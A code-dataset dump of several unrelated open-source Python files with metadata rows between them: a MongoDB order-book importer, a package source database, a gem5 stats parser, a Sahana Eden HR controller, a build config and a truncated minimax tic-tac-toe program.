from south.modelsinspector import add_introspection_rules
add_introspection_rules(
[],
[r'^dbservice\.apps\.utils\.fields\.IntervalField'])
except ImportError:
pass
|
mit
| 987,401,872,882,005,600
| 32.412429
| 79
| 0.609063
| false
| 3.687032
| false
| false
| false
|
rnicoll/cryptocurrency-market-data
|
old/load_data_vtc.py
|
1
|
3580
|
#!/usr/bin/python3.2
import pymongo
from datetime import datetime
import json
from os import listdir, remove
from os.path import isdir, isfile, join
from pymongo import MongoClient
import pprint
class ExchangeError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def importCryptsy(bid_currency, quote_currency, book_data, content, file_time):
if (content['success'] != 1):
raise ExchangeError('Unsuccessful response from Cryptsy')
if (not isinstance(content['return'], dict)):
raise ExchangeError('No object in response from Cryptsy')
market_data = content['return'][bid_currency]
asks = []
bids = []
if (isinstance(market_data['sellorders'], list)):
for order in market_data['sellorders']:
asks.append([order['price'], order['quantity']])
if (isinstance(market_data['buyorders'], list)):
for order in market_data['buyorders']:
bids.append([order['price'], order['quantity']])
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Cryptsy",
"time": file_time,
"asks": asks,
"bids": bids}
book_data.insert(book)
def importVircurex(bid_currency, quote_currency, book_data, content, file_time):
book = {"bid_currency": bid_currency,
"quote_currency": quote_currency,
"exchange": "Vircurex",
"time": file_time,
"asks": content["asks"],
"bids": content["bids"]}
book_data.insert(book)
client = MongoClient()
market_data_db = client.market_data
imported_files = market_data_db.imported_files
book_data = market_data_db.book
base_dir = "/home/jrn/cryptocurrency_data/vtc_book_data"
pp = pprint.PrettyPrinter(indent=4)
for hour in [ d for d in listdir(base_dir) if isdir(join(base_dir, d)) ]:
hour_dir = join(base_dir, hour)
for exchange in [ d for d in listdir(hour_dir) if isdir(join(hour_dir, d)) ]:
exchange_dir = join(hour_dir, exchange)
for data_file in [ f for f in listdir(exchange_dir) if isfile(join(exchange_dir, f)) ]:
file_path = join(exchange_dir, data_file)
file_time = datetime.strptime(data_file, "%Y-%m-%dT%H:%M+0000.json")
existing_file = imported_files.find_one({"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file})
if (existing_file):
print("File " + file_path + " already imported.")
continue
imported_file = {"market": "VTC/BTC",
"exchange": exchange,
"filename": data_file}
try:
with open(file_path, 'r') as f:
content = json.load(f)
except ValueError:
print ("File " + file_path + " contains is not valid JSON.")
remove(file_path)
continue
try:
object_id = imported_files.insert(imported_file)
if (exchange == "Cryptsy"):
importCryptsy("VTC", "BTC", book_data, content, file_time)
elif (exchange == "Vircurex"):
importVircurex("VTC", "BTC", book_data, content, file_time)
except KeyError as e:
print ("File " + file_path + " is invalid, missing key: " + str(e))
continue
except ExchangeError:
print ("File " + file_path + " is not a valid dataset.")
continue
|
mit
| -6,724,503,697,391,267,000
| 33.095238
| 95
| 0.575419
| false
| 3.764458
| false
| false
| false
|
hknyldz/pisitools
|
pisilinux/pisilinux/db/sourcedb.py
|
1
|
4805
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 - 2011, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import re
import gzip
import piksemel
import pisilinux
import pisilinux.specfile
import pisilinux.db.lazydb as lazydb
class SourceDB(lazydb.LazyDB):
def __init__(self):
lazydb.LazyDB.__init__(self, cacheable=True)
def init(self):
self.__source_nodes = {}
self.__pkgstosrc = {}
self.__revdeps = {}
repodb = pisilinux.db.repodb.RepoDB()
for repo in repodb.list_repos():
doc = repodb.get_repo_doc(repo)
self.__source_nodes[repo], self.__pkgstosrc[repo] = self.__generate_sources(doc)
self.__revdeps[repo] = self.__generate_revdeps(doc)
self.sdb = pisilinux.db.itembyrepo.ItemByRepo(self.__source_nodes, compressed=True)
self.psdb = pisilinux.db.itembyrepo.ItemByRepo(self.__pkgstosrc)
self.rvdb = pisilinux.db.itembyrepo.ItemByRepo(self.__revdeps)
def __generate_sources(self, doc):
sources = {}
pkgstosrc = {}
for spec in doc.tags("SpecFile"):
src_name = spec.getTag("Source").getTagData("Name")
sources[src_name] = gzip.zlib.compress(spec.toString())
for package in spec.tags("Package"):
pkgstosrc[package.getTagData("Name")] = src_name
return sources, pkgstosrc
def __generate_revdeps(self, doc):
revdeps = {}
for spec in doc.tags("SpecFile"):
name = spec.getTag("Source").getTagData("Name")
deps = spec.getTag("Source").getTag("BuildDependencies")
if deps:
for dep in deps.tags("Dependency"):
revdeps.setdefault(dep.firstChild().data(), set()).add((name, dep.toString()))
return revdeps
def list_sources(self, repo=None):
return self.sdb.get_item_keys(repo)
def which_repo(self, name):
return self.sdb.which_repo(self.pkgtosrc(name))
def which_source_repo(self, name):
source = self.pkgtosrc(name)
return source, self.sdb.which_repo(source)
def has_spec(self, name, repo=None):
return self.sdb.has_item(name, repo)
def get_spec(self, name, repo=None):
spec, repo = self.get_spec_repo(name, repo)
return spec
def search_spec(self, terms, lang=None, repo=None, fields=None, cs=False):
"""
fields (dict) : looks for terms in the fields which are marked as True
If the fields is equal to None this method will search in all fields
example :
if fields is equal to : {'name': True, 'summary': True, 'desc': False}
This method will return only package that contents terms in the package
name or summary
"""
resum = '<Summary xml:lang=.(%s|en).>.*?%s.*?</Summary>'
redesc = '<Description xml:lang=.(%s|en).>.*?%s.*?</Description>'
if not fields:
fields = {'name': True, 'summary': True, 'desc': True}
if not lang:
lang = pisilinux.pxml.autoxml.LocalText.get_lang()
found = []
for name, xml in self.sdb.get_items_iter(repo):
if terms == [term for term in terms if (fields['name'] and \
re.compile(term, re.I).search(name)) or \
(fields['summary'] and \
re.compile(resum % (lang, term), 0 if cs else re.I).search(xml)) or \
(fields['desc'] and \
re.compile(redesc % (lang, term), 0 if cs else re.I).search(xml))]:
found.append(name)
return found
def get_spec_repo(self, name, repo=None):
src, repo = self.sdb.get_item_repo(name, repo)
spec = pisilinux.specfile.SpecFile()
spec.parse(src)
return spec, repo
def pkgtosrc(self, name, repo=None):
return self.psdb.get_item(name, repo)
def get_rev_deps(self, name, repo=None):
try:
rvdb = self.rvdb.get_item(name, repo)
except Exception: #FIXME: what exception could we catch here, replace with that.
return []
rev_deps = []
for pkg, dep in rvdb:
node = piksemel.parseString(dep)
dependency = pisilinux.dependency.Dependency()
dependency.package = node.firstChild().data()
if node.attributes():
attr = node.attributes()[0]
dependency.__dict__[attr] = node.getAttribute(attr)
rev_deps.append((pkg, dependency))
return rev_deps
|
gpl-3.0
| -6,640,202,832,901,699,000
| 35.12782
| 98
| 0.589802
| false
| 3.696154
| false
| false
| false
|
bcheung92/Paperproject
|
gem5/pyscript/cachecmp.py
|
1
|
2915
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
|
mit
| 374,115,436,903,597,250
| 37.866667
| 90
| 0.651115
| false
| 3.091198
| false
| false
| false
|
ScottBuchanan/eden
|
controllers/hrm.py
|
1
|
25684
|
# -*- coding: utf-8 -*-
"""
Human Resource Management
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
s3db.hrm_vars()
# =============================================================================
def index():
""" Module Home Page """
mode = session.s3.hrm.mode
if mode is not None:
# Go to Personal Profile
s3_redirect_default(URL(f="person"))
else:
# Bypass home page & go direct to searchable list of Staff
s3_redirect_default(URL(f="staff", args="summary"))
# =============================================================================
# People
# =============================================================================
def human_resource():
"""
HR Controller
- combined Staff/Volunteers
Used for Summary view, Imports and S3AddPersonWidget2
"""
return s3db.hrm_human_resource_controller()
# -----------------------------------------------------------------------------
def staff():
""" Staff Controller """
# Staff only
s3.filter = FS("type") == 1
def prep(r):
table = r.table
tablename = r.tablename
get_vars = r.get_vars
# Use CRUD strings for staff
crud_strings = s3.crud_strings
crud_strings[tablename] = crud_strings["hrm_staff"]
resource = r.resource
if "expiring" in get_vars:
# Filter for staff with contracts expiring in the next 4 weeks
query = FS("end_date") < \
(request.utcnow + datetime.timedelta(weeks=4))
resource.add_filter(query)
# Adapt CRUD strings
crud_strings[tablename].title_list = \
T("Staff with Contracts Expiring in the next Month")
# Reconfigure
resource.configure(# Sort by Expiry
sortby = table.end_date,
# Remove the Add button
insertable=False
)
# Adapt list_fields
list_fields = [(T("Contract End Date"), "end_date"),
"person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
]
else:
# Adapt list_fields
list_fields = ["person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
(T("Email"), "email.value"),
(settings.get_ui_label_mobile_phone(), "phone.value"),
]
if settings.get_hrm_use_trainings():
list_fields.append("person_id$training.course_id")
if settings.get_hrm_use_certificates():
list_fields.append("person_id$certification.certificate_id")
list_fields.append((T("Contract End Date"), "end_date"))
list_fields.append("status")
resource.configure(list_fields = list_fields)
if r.interactive:
if r.id:
if r.method not in ("profile", "delete"):
# Redirect to person controller
vars = {
"human_resource.id": r.id,
"group": "staff"
}
args = []
if r.representation == "iframe":
vars["format"] = "iframe"
args = [r.method]
redirect(URL(f="person", vars=vars, args=args))
else:
if r.method == "import":
# Redirect to person controller
redirect(URL(f="person",
args="import",
vars={"group": "staff"}))
elif not r.component and r.method != "delete":
# Configure site_id
field = table.site_id
site_id = get_vars.get("site_id", None)
if site_id:
field.default = site_id
field.writable = False
field.comment = DIV(DIV(_class="tooltip",
_title="%s|%s" % (
settings.get_org_site_label(),
T("The facility where this position is based."),
#messages.AUTOCOMPLETE_HELP,
)))
#field.comment = S3AddResourceLink(c="org", f="facility",
# vars = dict(child="site_id",
# parent="req"),
# title=T("Add New Site"),
# )
# Hide status field
table.status.writable = table.status.readable = False
# Assume staff only between 16-81
s3db.pr_person.date_of_birth.widget = S3DateWidget(past=972,
future=-192)
elif r.representation == "xls":
# Make it match Import sheets
list_fields = s3db.get_config(tablename, "list_fields")
# Remove "id" as XLS exporter doesn't like this not being first & has complicated skipping routines
try:
list_fields.remove("id")
except ValueError:
pass
# Separate Facility Type from Facility Name
table.site_id.represent = s3db.org_SiteRepresent(show_type = False)
i = 0
for f in list_fields:
i += 1
if f == "site_id":
break
list_fields.insert(i,
(T("Facility Type"),
"person_id$human_resource.site_id$instance_type"))
# Split person_id into first/middle/last
try:
list_fields.remove("person_id")
except ValueError:
pass
list_fields = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name",
] + list_fields
s3db.configure(tablename,
list_fields = list_fields)
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
if not r.component:
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
s3_action_buttons(r, deletable=settings.get_hrm_deletable())
if "msg" in settings.modules and \
settings.get_hrm_compose_button() and \
auth.permission.has_permission("update", c="hrm", f="compose"):
# @ToDo: Remove this now that we have it in Events?
s3.actions.append(
{"url": URL(f="compose",
vars = {"human_resource.id": "[id]"}),
"_class": "action-btn send",
"label": str(T("Send Message"))
})
#s3.scripts.append("/%s/static/scripts/jquery.doubleScroll.js" % appname)
#s3.jquery_ready.append('''$('.dataTable_table').doubleScroll()''')
#s3.jquery_ready.append('''$('.dataTables_wrapper').doubleScroll()''')
elif r.representation == "plain":
# Map Popups
output = s3db.hrm_map_popup(r)
return output
s3.postp = postp
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person():
"""
Person Controller
- used for access to component Tabs, Personal Profile & Imports
- includes components relevant to HRM
"""
return s3db.hrm_person_controller()
# -----------------------------------------------------------------------------
def profile():
"""
Profile Controller
- includes components relevant to HRM
"""
request.args = [str(s3_logged_in_person())]
# Custom Method for Contacts
s3db.set_method("pr", resourcename,
method = "contacts",
action = s3db.pr_Contacts)
if settings.has_module("asset"):
# Assets as component of people
s3db.add_components("pr_person",
asset_asset = "assigned_to_id",
)
group = get_vars.get("group", "staff")
# Configure human resource table
tablename = "hrm_human_resource"
table = s3db[tablename]
table.type.default = 1
# Configure person table
tablename = "pr_person"
table = s3db[tablename]
s3db.configure(tablename,
deletable = False,
)
# Configure for personal mode
s3.crud_strings[tablename].update(
title_display = T("Personal Profile"),
title_update = T("Personal Profile"))
# CRUD pre-process
def prep(r):
if r.interactive and r.method != "import":
if r.component:
if r.component_name == "physical_description":
# Hide all but those details that we want
# Lock all the fields
table = r.component.table
for field in table.fields:
table[field].writable = table[field].readable = False
# Now enable those that we want
table.ethnicity.writable = table.ethnicity.readable = True
table.blood_type.writable = table.blood_type.readable = True
table.medical_conditions.writable = table.medical_conditions.readable = True
table.other_details.writable = table.other_details.readable = True
else:
table = r.table
table.pe_label.readable = table.pe_label.writable = False
table.missing.readable = table.missing.writable = False
table.age_group.readable = table.age_group.writable = False
# Assume volunteers only between 12-81
table.date_of_birth.widget = S3DateWidget(past=972, future=-144)
return True
else:
# Disable non-interactive & import
return False
s3.prep = prep
# CRUD post-process
def postp(r, output):
if r.interactive and r.component:
if r.component_name == "human_resource":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
if r.component_name == "experience":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_experience_start_date','hrm_experience_end_date')''')
return output
s3.postp = postp
output = s3_rest_controller("pr", "person",
rheader = s3db.hrm_rheader,
)
return output
# -----------------------------------------------------------------------------
def hr_search():
"""
Human Resource REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person_search():
"""
Person REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("pr", "person")
# =============================================================================
# Teams
# =============================================================================
def group():
"""
Team controller
- uses the group table from PR
"""
return s3db.hrm_group_controller()
# -----------------------------------------------------------------------------
def group_membership():
"""
Membership controller
- uses the group_membership table from PR
"""
# Change Labels & list_fields
s3db.hrm_configure_pr_group_membership()
# Only show Relief Teams
# Do not show system groups
# Only show Staff
table = db.pr_group_membership
gtable = db.pr_group
htable = s3db.hrm_human_resource
s3.filter = (gtable.system == False) & \
(gtable.group_type == 3) & \
(htable.type == 1) & \
(htable.person_id == table.person_id)
def prep(r):
if r.method in ("create", "create.popup", "update", "update.popup"):
# Coming from Profile page?
person_id = get_vars.get("~.person_id", None)
if person_id:
field = table.person_id
field.default = person_id
field.readable = field.writable = False
return True
s3.prep = prep
output = s3_rest_controller("pr", "group_membership",
csv_template="group_membership",
csv_stylesheet=("hrm", "group_membership.xsl"),
)
return output
# =============================================================================
# Jobs
# =============================================================================
def department():
""" Departments Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_department)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def job_title():
""" Job Titles Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
s3.filter = FS("type").belongs((1, 3))
if not auth.s3_has_role(ADMIN):
s3.filter &= auth.filter_by_root_org(s3db.hrm_job_title)
output = s3_rest_controller()
return output
# =============================================================================
# Skills
# =============================================================================
def skill():
""" Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_type():
""" Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def competency_rating():
""" Competency Rating for Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_provision():
""" Skill Provisions Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def course():
""" Courses Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_course)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def course_certificate():
""" Courses to Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def certificate():
""" Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if settings.get_hrm_filter_certificates() and \
not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_certificate)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def certificate_skill():
""" Certificates to Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def training():
""" Training Controller - used for Searching for Participants """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_training_controller()
# -----------------------------------------------------------------------------
def training_event():
""" Training Events Controller """
return s3db.hrm_training_event_controller()
# -----------------------------------------------------------------------------
def credential():
""" Credentials Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_credential_controller()
# -----------------------------------------------------------------------------
def experience():
""" Experience Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_experience_controller()
# -----------------------------------------------------------------------------
def competency():
"""
RESTful CRUD controller used to allow searching for people by Skill
"""
s3.filter = FS("person_id$human_resource.type") == 1
field = s3db.hrm_competency.person_id
field.widget = S3PersonAutocompleteWidget(ajax_filter = "~.human_resource.type=1")
return s3db.hrm_competency_controller()
# =============================================================================
def skill_competencies():
"""
Called by S3OptionsFilter to provide the competency options for a
particular Skill Type
"""
table = s3db.hrm_skill
ttable = s3db.hrm_skill_type
rtable = s3db.hrm_competency_rating
query = (table.id == request.args[0]) & \
(table.skill_type_id == ttable.id) & \
(rtable.skill_type_id == table.skill_type_id)
records = db(query).select(rtable.id,
rtable.name,
orderby=~rtable.priority)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_org_site_json():
"""
Used by the Asset - Assign to Person page
"""
table = s3db.hrm_human_resource
otable = s3db.org_organisation
query = (table.person_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(table.site_id,
otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_for_site():
"""
Used by the Req/Req/Create page
- note that this returns Person IDs
"""
try:
site_id = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Site provided!")
else:
table = s3db.hrm_human_resource
ptable = db.pr_person
query = (table.site_id == site_id) & \
(table.deleted == False) & \
(table.status == 1) & \
((table.end_date == None) | \
(table.end_date > request.utcnow)) & \
(ptable.id == table.person_id)
rows = db(query).select(ptable.id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
orderby=ptable.first_name)
result = []
append = result.append
for row in rows:
append({"id" : row.id,
"name" : s3_fullname(row)
})
result = json.dumps(result)
response.headers["Content-Type"] = "application/json"
return result
# =============================================================================
# Salaries
# =============================================================================
def staff_level():
""" Staff Levels Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def salary_grade():
""" Salary Grade Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Insurance Information
# =============================================================================
def insurance():
""" Insurance Information Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Awards
# =============================================================================
def award_type():
""" Award Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def award():
""" Awards Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Disciplinary Record
# =============================================================================
def disciplinary_type():
""" Disciplinary Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def disciplinary_action():
""" Disciplinary Action Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Messaging
# =============================================================================
def compose():
""" Send message to people/teams """
return s3db.hrm_compose()
# END =========================================================================
|
mit
| -650,041,428,619,606,000
| 32.312581
| 111
| 0.455108
| false
| 4.657117
| true
| false
| false
|
cloudnull/genastack_roles
|
genastack_roles/heat_engine/__init__.py
|
1
|
1045
|
# =============================================================================
# Copyright [2013] [Kevin Carter]
# License Information :
# This software has no warranty, it is provided 'as is'. It is your
# responsibility to validate the behavior of the routines and its accuracy
# using the code provided. Consult the GNU General Public license for further
# details (see GNU General Public License).
# http://www.gnu.org/licenses/gpl.html
# =============================================================================
BUILD_DATA = {
'heat_engine': {
'help': 'Install heat-engine from upstream',
'required': [
'python',
'heat',
'heat_client'
],
'init_script': [
{
'help': 'Start and stop heat-engine on boot',
'init_path': '/etc/init.d',
'name': 'heat-engine',
'chuid': 'heat',
'chdir': '/var/lib/heat',
'program': 'heat-engine'
}
]
}
}
|
gpl-3.0
| -6,973,453,614,583,198,000
| 33.833333
| 79
| 0.449761
| false
| 4.644444
| false
| false
| false
|
anuragxel/ultimate-tic-tac-toe
|
xxx.py
|
1
|
9042
|
#!/usr/bin/python
#
# Negamax variant of minmax
#
# This program is for demonstration purposes, and contains ample
# opportunities for speed and efficiency improvements.
#
# Also, a minmax tree is not the best way to program a tic-tac-toe
# player.
#
# This software is hereby granted to the Public Domain
#
import sys,os
import random
import numpy as np
import json
# from_file=np.genfromtxt("foo.csv",delimiter=",")
# all_state=np.array(from_file).tolist()
# print states
# for i in from_file:
# all_state.append(i)
INFINITY=99999999
def numStr(n):
if n == INFINITY: return "+INFINITY"
elif n == -INFINITY: return "-INFINITY"
return str(n)
def write_to_file():
global states
global f
json.dump(states,f)
f.close()
#print states
# final_add = []
# # print states
# # print all_state
# print to_print
# for e in all_state:
# if e not in final_add:
# final_add.append(e)
# np.savetxt("foo.csv",final_add,delimiter=",")
#-------------------------------------------------------------------
class MinMax(object):
def __init__(self, maxdepth=INFINITY):
self.bestmove = -1
self.maxdepth = maxdepth
def _buildtree_r(self, playboard, curplayer, depth):
"""Recursively build the minmax tree."""
# figure out the value of the board:
if depth > self.maxdepth: return 0 # who knows what the future holds
if curplayer == Board.X:
otherplayer = Board.O
else:
otherplayer = Board.X
winner = playboard.getWinner()
if winner == curplayer:
return INFINITY
elif winner == otherplayer:
return -INFINITY
elif playboard.full():
return 0 # tie game
# get a list of possible moves
movelist = playboard.getCandidateMoves()
alpha = -INFINITY
# for all the moves, recursively rate the subtrees, and
# keep all the results along with the best move:
salist = []
for i in movelist:
# make a copy of the board to mess with
board2 = playboard.copy()
board2.move(curplayer, i) # make the speculative move
subalpha = -self._buildtree_r(board2, otherplayer, depth+1)
if alpha < subalpha:
alpha = subalpha;
# keep a parallel array to the movelist that shows all the
# subtree values--we'll chose at random one of the best for
# our actual move:
if depth == 0: salist.append(subalpha)
# if we're at depth 0 and we've explored all the subtrees,
# it's time to look at the list of moves, gather the ones
# with the best values, and then choose one at random
# as our "best move" to actually really play:
if depth == 0:
candidate = []
board_state=''
for i in range(len(salist)):
if salist[i] == alpha:
candidate.append(movelist[i])
#print("Best score: %s Candidate moves: %s" % (numStr(alpha), candidate))
self.bestmove = random.choice(candidate)
# all_state.append(self.bestmove)
board_state=playboard.get_board_values()
states[board_state]=self.bestmove
return alpha
def buildtree(self, board, curplayer):
self.bestmove = -1
alpha = self._buildtree_r(board, curplayer, 0)
return self.bestmove
#-------------------------------------------------------------------
class Board(list):
"""Holds a complete board in self, row-major order."""
NONE = 0
X = 1
O = 2
def __init__(self):
for i in range(9): self.append(Board.NONE)
def copy(self):
"""Clone a board."""
b = Board()
for i in range(9):
b[i] = self[i]
return b
def move(self, color, pos):
"""Fill a position on the board."""
self[pos] = color
def getCandidateMoves(self):
"""Get a list of free moves."""
clist = []
for i in range(9):
if self[i] == Board.NONE:
clist.append(i)
return clist
def full(self):
"""Returns true if the board is full."""
for i in range(9):
if self[i] == Board.NONE:
return False
return True
def _check(self, a, b, c):
if self[a] == self[b] and self[a] == self[c] and self[a] != Board.NONE:
return self[a]
return Board.NONE
def getWinner(self):
"""Figure out who the winner is, if any."""
winner = self._check(0,1,2)
if winner != Board.NONE: return winner
winner = self._check(3,4,5)
if winner != Board.NONE: return winner
winner = self._check(6,7,8)
if winner != Board.NONE: return winner
winner = self._check(0,3,6)
if winner != Board.NONE: return winner
winner = self._check(1,4,7)
if winner != Board.NONE: return winner
winner = self._check(2,5,8)
if winner != Board.NONE: return winner
winner = self._check(0,4,8)
if winner != Board.NONE: return winner
winner = self._check(2,4,6)
if winner != Board.NONE: return winner
return Board.NONE
def get_board_values(self):
r=''
for i in range(9):
if self[i] == Board.NONE:
#r += '%d' % i
r = r+ '-'
elif self[i] == Board.X:
r = r + 'x'
elif self[i] == Board.O:
r = r+ 'o'
# if i == 2:
# r += '| 0 1 2\n%s\n' % blank
# if i == 5:
# r += '| 3 4 5\n%s\n' % blank
# if i == 8:
# r += '| 6 7 8\n%s\n' % blank
return r
def __str__(self):
""" Pretty-print the board."""
blank = '+-+-+-+'
r = blank + '\n'
for i in range(9):
r += '|'
if self[i] == Board.NONE:
#r += '%d' % i
r += ' '
elif self[i] == Board.X:
r += 'X'
elif self[i] == Board.O:
r += 'O'
if i == 2:
r += '| 0 1 2\n%s\n' % blank
if i == 5:
r += '| 3 4 5\n%s\n' % blank
if i == 8:
r += '| 6 7 8\n%s\n' % blank
return r
#-------------------------------------------------------------------
# MAIN:
# make the real board we'll be using
def main():
global f
global states
f = open('foo.csv','r+')
if os.stat("foo.csv").st_size != 0:
states = json.load(f)
f.close()
open('foo.csv', 'w').close()
f = open('foo.csv','rw+')
else:
states = {}
board = Board()
# attach it to a MinMax tree generator/evaluator, max depth 6:
mm = MinMax(6)
#sys.stdout.write("Who's first? (H)uman or (C)omputer? ")
#sys.stdout.flush()
#first = sys.stdin.readline().strip().lower()[0]
first = random.choice(['h','c'])
if first == 'h':
curplayer = Board.O # human
